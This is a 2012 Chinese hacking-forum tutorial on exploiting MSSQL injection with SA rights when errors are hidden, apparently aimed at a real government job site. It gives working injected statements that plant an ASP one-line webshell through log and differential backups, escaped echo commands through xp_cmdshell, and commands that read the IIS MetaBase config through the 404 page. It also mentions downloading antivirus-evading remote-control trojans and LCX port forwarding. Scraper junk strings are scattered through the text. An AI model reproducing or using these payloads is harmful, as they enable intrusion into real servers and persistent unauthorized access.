中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]

作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
$ W+ S1 d7 E$ U; L1 x7 F5 @3 ]! x% _6 L9 B; {' V! Q8 t& ]$ m$ q
& W* T; p- G1 N% \' S
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。( F0 U9 _, D3 b. T6 X7 U# Z
2 f: Q/ }1 b6 S
                                                                 
/ A2 y( ~2 u8 d                                                                 8 r3 a/ W. j/ l# L, f, P3 e& P  ^
                                                                  论坛: http://www.90team.net/2 C9 W- [" @" ~$ l5 a6 L0 J

4 y% ]/ k7 S/ p0 {3 L' |
  p. ~' i% f: M9 B2 v: n$ `
6 J, X9 D: V$ C友情检测国家人才网+ m0 B6 Q6 B+ L3 F

$ G& F5 A9 d' Q8 Q9 q+ P0 ~
# H' r1 _( \/ [) t内容:MSSQL注入SA权限不显错模式下的入侵7 S4 a& ~: u) }' m4 b

, U7 X4 @3 o5 r, K
+ A; V- [4 F3 Y. m2 G% z  W# u  ]4 ]一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
9 F1 G" h: j& Q( H8 F* X- n/ H2 s, n8 e0 o2 U$ @0 D# c; X- j
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
# F' I7 N; W3 ~+ U' Q9 r) ^: Y6 V6 Z1 D( A6 e8 c% o! K4 m$ t

$ X8 J" S: p' Q% a这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。* l8 I8 G6 D5 T4 _9 F8 w

, V8 m- _& R# G. S. X思路:
( i3 w, c) ]2 D4 V& u- {& N6 h( W1 ~; A* t8 B/ }& q, M- Y# ~) s5 E
首先:
; ^) p$ j+ e' W( Z& A- y5 ]
2 P6 s& b- x2 c通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
8 L0 ]1 d: y3 A' o% ~9 ^0 m0 {
, J! [; C! q8 l( A; ^0 a$ X/ {1.日志备份获得Webshell# Q# X% V' d8 `+ O& O
6 m" S6 W* D; h8 R- [, z
2.数据库差异备份获得Webshell! w# Y; a0 ^3 x9 ]( L
0 {; y" [3 y. d' @& V9 q
4.直接下载免杀远控木马。5 E  q) [. E6 s5 D  B

' \: w8 A! a1 a2 B5.直接下载LCX将服务器端口转发出来" V1 l+ i& N; ^
! O8 G# D' v' Z
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。* l+ T+ L2 u& t9 `) G6 e2 e9 W

4 G; |7 P' Q3 I3 w2 g. {' ^* _% m1 p" C1 `& B& j2 y
) k9 T( ~, t' K+ c* v
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
# L7 {  i5 X7 P2 g. ?+ r* U; F6 t6 N: r7 p' z% i3 H! A) L# [
我直接演示后面一个方法
- S* j0 T4 E- L7 b  `1 _6 T5 |( M9 q

, s- o: ]# }, _分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
8 ]7 [* r: O* ~2 P
! {- x* _% M' C4 o9 g1 O$ `6 A
: z  `% Y0 O3 F& O' p+ A
+ C4 ~3 t. n/ o4 \, \# n
+ H' [$ _: j! T; p◆日志备份:
8 D' V9 i% I+ k# _
" i+ W( F4 G  ]! v+ r
' e9 F( E, n1 X5 [1. 进行初始备份- h/ C) d; v+ Y' I
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--+ O0 K6 T, X' d

, l8 i6 n8 F5 D% L9 \0 n2. 插入数据
1 W7 y7 v) p1 M( {3 \0 P5 U( L;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
! {; b! ]# F5 ^! x6 }2 z
! |- d6 _/ N6 Q' ]- m4 C* a" E0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
6 u6 y' f& c+ J6 g: g  
9 g7 i8 [, Y# Z# ~3. 备份并获得文件,删除临时表7 P6 J3 A- R! G- C4 B
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
5 z) P# R( ^' e/ J# c
" ?( P( M$ M' k  ]. w5 Y  B' z
4 |9 r+ c1 b( \: e$ V# x0 g/ |* Q' |' ]# D2 C, t* U
◆数据库差异备份
8 R& [  A) d; h5 d& a! U0 q/ U0 M/ f  \
(1. 进行差异备份准备工作
2 B! B8 p$ Y5 b% e5 k# R: e- U/ z! D2 h% k; A5 K# M
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
8 r0 G- j) l: h4 L' y& K
# \, s5 t7 ?, _- g' s$ n8 R# U上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码' t8 [. C; ^/ l5 O3 p

& u4 m8 a7 h( Q3 W, P  s8 f- v- ^
+ T! _8 _; X6 f0 M3 x4 Y(2. 将数据写入到数据库6 U' o3 }: A0 ]# p5 Q6 y* F
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
$ _) _4 W  P, B- |# e. j
' z/ V; C; K8 v$ M9 H6 y0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
; q* y! a, }1 G' l' A& T8 J
; T$ e0 U/ ]  H( D, i3. 备份数据库并清理临时文件) U0 Y0 `+ E. k$ ?
9 x( m( V4 ]5 e+ W2 H
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
& L# W6 H7 f/ B8 W) D2 y3 U0 i: |0 b
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
, i0 m! ?3 t" D) U
5 Z0 ?+ }( V# v7 T, L& C" t# P- G- n  z- w  Y' m6 b6 J' _

# p+ [! e1 d* Z: Q用^转义字符来写ASP(一句话木马)文件的方法:   
  E8 i5 V" u& A' i  n0 U
/ X7 A- w( |5 w4 q! @" w1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--$ m1 i: h" r3 t
& m$ W9 j! P) I3 H* L; V& ?  `4 P
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp   j( R# m$ i* F. P' B: c

! ~& R; U4 q3 A, c) e& L读取IIS配置信息获取web路径
& I: d7 H% s) N1 {+ A1 `# j4 F  E: f) k( \2 Q/ W' P
     $ I+ C% h* D, K" ~) c" p, K
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--% E) A3 z. z( u% r# Q( N
, g5 z, J4 g, e& o5 f" {2 e; H/ _6 L
执行命令
+ ]7 O$ K6 q3 j1 n     5 u1 t+ ?7 ]: @
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--- m$ T: C7 y& v6 Y4 S: I
& c4 u2 ~/ Y" H9 U6 F
; }9 q$ m  L6 B2 F( m
/ U, K, t0 v  \, |- J  V2 _5 J
, A3 C. C# o, c. S! R" @

# }( f$ _+ ?# `$ }4 e* L# x$ m2 I2 W" b$ b+ L$ ^% F9 l$ R" }
5 h' `9 ^; [% v; I

& R/ i! `, K: |# e1 ]9 i- N; M% H3 c- X& C' c

- D( `* q' ~( m
' {( q: `; A2 \1 e9 t' j0 I3 n& A, L; d3 B& j

2 W1 ?+ o# V& K5 q) j, r8 A  V! M: T6 R' F2 B' h0 }
: z! G/ s" v, y4 f6 p

( v3 j- N6 u$ N+ x  ^9 q# \! j1 d+ R9 F8 H

% T% Y7 x2 j; ]7 K, i/ S: E3 g" N( Y! `

/ [: M: e* H5 I+ E9 `
% P/ t, @* |8 B1 e
. k5 H% F  o' S: ?7 q  v" \, g- F3 e1 _6 x: f7 Q, z

7 [3 j% m" Z  k3 ]5 h' C4 k/ A; f
7 @$ Z! K: l' t% A
+ f+ l7 ^$ t) {6 j) h. u
8 d; r% |' u3 f+ _( X/ k7 G! D7 ^( L/ x8 B# O  b4 T
# D7 H4 W8 O1 e

, m& a) u5 _# ~, L* T' i1 v7 h) |9 W" g8 l* P! @: w
: `: l  @2 ?2 j! _

" F; ~, Y5 N: I  a0 }
% u* q: ]1 g: O$ ^: s+ M0 ^$ m% q. P$ m! z4 a3 G$ p

. Q0 p+ A3 v' `4 X1 F& @( b# j% y, m  \  F

" P* L+ T, d3 U: K! y9 p0 q/ o; T& z2 @- t
9 L( V) p! B3 i5 s
) u8 [6 o) C) \7 `: Z8 X2 ~; p
  y1 G7 v9 u- B7 v" _( G
1 N7 S" ^- F* \: z/ Y5 J
! `; D( E+ E: X* j8 R  Q* y% c% o7 @0 Q

: O6 ]( m# A7 t1 ~0 p9 P/ R8 r" w9 b+ k+ v

4 }( u  X, l2 B. }$ |" M/ T7 N) r% g5 l8 B2 K





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2